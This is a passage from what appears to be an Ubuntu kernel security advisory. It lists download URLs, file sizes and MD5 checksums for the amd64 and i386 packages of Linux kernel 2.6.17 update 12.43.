http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    54024 58805876572a665f4ee930dd031fe271
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   189510 3baf972b680afac6017d498d3139a1c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    40028 b7ba746a91d6ee3d22281d242ecb0cce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   167744 276c9cae47fea158f010c9e9e4f04cc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    60446 994cf3669c701f3e1336fdb0d80cac91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   154562 2957b41258642e256d453a061cc3d219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   314684 65a235b5a3258afe62924d8d962bbdf4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   105984 3b483a47da6b7b974619982ed1dd1b0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:  1904886 31043dbf63f7fff0a46a17b20969a62d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb
  Size/MD5:   908872 f4a952f077d42bd99dac73248521c6f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_amd64.deb
  Size/MD5:   913364 758d91637533ae5e080b637024f1681d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_amd64.deb
  Size/MD5:  7430792 b3c5bf05fab75da55cd6a29e874452f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb
  Size/MD5: 23811514 fff7d351088cfc95d13afb9e240773d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_amd64.deb
  Size/MD5: 24390532 b8889d70f1eaa4ec8dc9d7feda1f6dc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb
  Size/MD5:  2341466 5d5c42e611287c5867da6f9fe9517de9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_amd64.deb
  Size/MD5:  2340116 a773aac3beb5aa0ef0630b95b321e88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_amd64.deb
  Size/MD5:  1772018 a783af129fea695b41510174eb43d345
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    16788 34074cba4be650462232dca85e2104ea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   279182 33e7fc01312168bfda6c2ed7e4847cc5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   256910 22dda36c134a86e4eab945493f568bd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:  1048488 572cc74c21331f50cd46468bbe42e7c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:  2103834 7867da5294924f2329268a010acf50ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   164438 2d6b9ba760717b711528b7f729ec0c1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    10502 544a81e351b9d9c14e56e924a6179c21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    93360 9d0dd71df54a14334a2d56df02dc70b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    52564 79d82bd8c45bad6f92fb6711786ed307
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    39814 e9213be66eca3f6b6d073e1a14f1a306
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    79820 8115473b2953a78a0b451d3aaaebc793
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:     6332 279d471ccb620dc327e808225c35de8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:     9370 92f7e30eb7bb55cfa08198e141becd14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    62724 0bf2ba4988f7361accbe6fe7f0e7fb6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   138620 ebca050307f87ac2d72ebd9bc689e7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   115686 0531aaadc28eb1f9553f42d29e45cf7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    90614 b51479c44a516e3b7b1d9d6501351732
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:  1286186 7fd5738a9d02487f8205f7d4438df1c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    80588 1eaebfa015089b95fb4b33e0e3d54831
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    13478 2fc4ef01ba125ff2c58541f680aea075
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    76274 2e8780a4c9f01d284f0f1721b9e6a80b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    36064 240b896de4d9d3b6e3e9078400f8a9f3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   151840 65707cf2f8925a5a89c2e13ddcbf0c04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:    53542 5de4ee3697a7e239fcafdd39c68d045a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb
  Size/MD5:   323448 02893e9d497b071b0379937a81316fbb

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    21210 90bb4a1eaf048397151cda845fe401f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    23814 164eeb1b9f128c5ee852efcd0bf6f09f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    43878 d9456b9d963455fdd95955e31c92fb0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    44472 9ca39b7bf2e0c126e56bd46095a5726c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   104800 51595b0395fd381c41d93570df72dffd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    49412 5666f98c8991e30887c9677c81f7a76d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     2368 1cf01d58d7c70fa5dc5c1a3b7f796b0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     2386 1bb0d2b50b6abcc517c8c1e591db1188
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    35304 880cdb09c2afcdf33ca40b9c13ddfc0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    36730 dc104bd3c776255fc5738200b86ea3e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    98282 a4a2536dface30a86fb49f2d1747c95d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   103506 08dc4f5c3ff60ba0bc9db2a92f249b4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    38464 0288c1b2739b79f239c2c398d7703a86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    39218 ba8b176b541052598a6c82a842aea87c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    44262 cff486146f47b112da60140687965946
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    44668 21193a742cddbd1c62ad0fa7d5720ed8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   172766 643ad8c80d7e3beb34f5d1da62d867d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   175168 812aafb1b907e821f6d3c8d3f8d9b593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    33752 f109ef9e5b987019de1e3cf0ec23bd5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    34712 dbb5e40f1ac6b1b8ff50740f04808a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   140568 65b14145f46c5f5a4333231248f34bc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   143824 cf95c4ede04a08b6c7889e08348af8bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    51750 d58a3e4b7a2d9d0206cba67e5e3e3d35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    53178 ba13e94b724e38b9716dde36594f3bf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   131596 36f23a4d5b41b318b4699931d286e5c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   139174 456392c847ef3b5e2a46b88361b49571
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   288332 01d4271ae5667e584bb797bb29fef703
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   290688 5118af753b583834e2c73607f511fdc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   103544 baa598f64f024be463dee2c50a5f8e1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   106708 a36aa0d353997b26fb31b9ead239fe78
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1737910 e5f7666e862b98a399f5344fdfdc2ed1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1803750 ee8687d07d5768fe7980155663d11132
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.43_i386.deb
  Size/MD5:   910860 0466ac4f169db0b306b323ebb55fd8bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_i386.deb
  Size/MD5:   914056 56b0539e10fcfe31da8ae9fa4d9e7975
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb
  Size/MD5:   911722 6cceb0b5dfd5ac6b9104cb3e513e2556
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_i386.deb
  Size/MD5:   919298 178db23c4a81c28891cdbc86d37d1b95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_i386.deb
  Size/MD5:  7426150 d216c4ffcdeea0810aee0790f629da75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.43_i386.deb
  Size/MD5: 22802810 31c622390efeb404063898f4491bbe0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_i386.deb
  Size/MD5: 22935968 12f638d7c23cccfec9752ade307be1f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb
  Size/MD5: 23746230 601e62d57735ba78526b4079d914a2d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_i386.deb
  Size/MD5: 23246944 0ef40430dd5d01c2aa4698af31c57bae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.43_i386.deb
  Size/MD5:  1962604 1175ac7b4ba79b7f305a1a74d931d5f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_i386.deb
  Size/MD5:  2030506 2e920daca195cf289122fb8f41750737
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb
  Size/MD5:  2068164 f7978d05bfff5a44bdaa945784111614
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_i386.deb
  Size/MD5:  2030120 7e20aee45239a29d630b21db08b20887
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_i386.deb
  Size/MD5:  1772080 063d4574c54b2106c50fe2aa85e73ea9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    15368 96f76d56e018b60b3eaf0f698bf53b0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    15732 8a28056b915141194af890edf2a857cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   253320 62259e21984827827bb237207a3c434c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   263866 e515dace37d353b855decb1894c03526
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   220356 d82fbe1807f427957d2240e4d6ee2de2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   227606 9841f92234aeb38595f1293b494568e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1048396 efe5e40a4ae6796607860e5d840a5a47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1048474 d563de8e4950bc06a27fab7459ad3d13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  2092330 71269925380b7a53f571a792902e40e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  2142966 244c5b370c5702454a45fb98e291b893
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   156878 34e962d29e772315d6a8bec7bd8125a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   152162 207cf979445881979febccef8f8c8f16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     9180 653053c650343a44e34729fe57917e22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     9648 4e38d07f2067367b9ac6e61ddba3cf1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    79222 7388ad369b101a9dae3bd539a754d4c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    81770 29bfefabc36a16493a6c928e5c58da38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    55084 a6c3b4f079a095432b01a305cbae1396
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    56718 03f87fee426b9cc7fc35dc697ac325ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    34482 65bf40cdcfc50d3832c0ff11718f5396
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    35408 d04fc0238dcd62de3fb9e0b696984f21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    85872 2e70dabbc267da94fd563983d00e5107
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    87422 6eab637529e91e42132421a2623ca118
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     6082 4b7dd3a6d7a23d2ac89d8474f92a6539
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     6094 203d5f595becc3bb0d957dd549adb75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     8606 76c97fd3e2a3cb7de66fa2c1f5e398c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:     8896 0cdf1a91eb6071ea5995d851aecb81b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    52688 ba24acfaeb327bf001d504acc7d5b75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    55122 a6884e5f912d6465674ce54c432bef12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   129974 5daf3e9a11ac11bc33ebfb8995c0c5a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   132968 50c95f3dcf8d14b56fdb82306d94b7c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    99866 102ff3cf54930b07dced990e7c30a70b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   101180 8f60dad4cecf4e8e0f0bf30d2162ffc1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    79570 14fc6f678413e604b19cd3a33822b5a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    80934 7284906fa24651580cb843cee6257cfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1394988 43c6a6fd2292cf49d985dc7b5084e19e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:  1398074 23664d8e6a692cd769334ccb78fb7410
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    69148 867580f768fe09e83f12202b7f7e597c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    71084 eb40bc9dcbf86451aa20c2db96d34f01
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    11424 6b8b68d6a549d95ab38c3188ed8e6fc1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    11978 9554a7b0b1f5dfdb947c3344bf25e854
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    62476 ab5f24aab938d7761c8d8f5442b63f5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    63810 d4cbcad8cbc7229d93ea2e7d48d39281
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    36010 94aa7cefcd3dd08d4a0f978267922dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    36522 a72b7b1633c362baf4d0c6083675319e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   127286 a868972d2e67d6ec03b8412fe7dd28ac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   131320 f749aa5ebbee0a4abdd9c96cb603ede2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    46806 0a9099db77a10a02a3ec302e7775e0f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:    47566 1ac5455bfc93bd8a7092b1b996df28af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb
  Size/MD5:   311918 e7142f360d3687c441d7b3a0d69d25ac
